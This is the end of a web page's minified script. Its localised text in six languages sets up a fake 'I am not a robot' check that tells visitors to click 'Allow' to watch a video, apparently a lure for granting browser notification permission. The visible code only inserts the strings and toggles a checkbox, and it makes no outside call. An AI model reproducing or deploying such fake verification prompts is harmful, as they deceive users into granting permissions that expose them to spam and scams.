                    t: 'Aby uzyskać dostęp do wideo, kliknij <span>"Pozwól"</span>',
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                ru: {
                    c: "Я не робот",
                    t: "Чтобы получить доступ к видео, нажмите <span>«Разрешить»</span>",
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                fr: {
                    c: "Je ne suis pas un robot",
                    t: 'Pour accéder à la vidéo, cliquez sur <span>"Autoriser"</span>',
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    c: "Ich bin kein Roboter",
                    t: 'Um auf das Video zuzugreifen, klicke auf <span>"Zulassen"</span>',
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    c: "No soy un robot",
                    t: 'Para acceder al video, haga clic en <span>"Permitir"</span>',
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                th: {
                    c: "ฉันไม่ใช่หุ่นยนต์",
                    t: 'หากต้องการเข้าถึงวิดีโอคลิก <span>"อนุญาต"</span>',
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), null !== window.opener && document.body.classList.add("isPopup"), "yandex" === v.n && document.body.classList.add("isYandex"), document.querySelector(".video__descrT").innerHTML = b.get("t"), document.querySelector(".capcha__tx").innerHTML = b.get("c"), document.querySelector(".msgReady__tx").innerHTML = b.get("msgReady"), document.querySelector(".capcha__wCheck").addEventListener("click", function() {
                this.classList.toggle("isActive")
            })
        }]);
    </script>

</body>

</html>
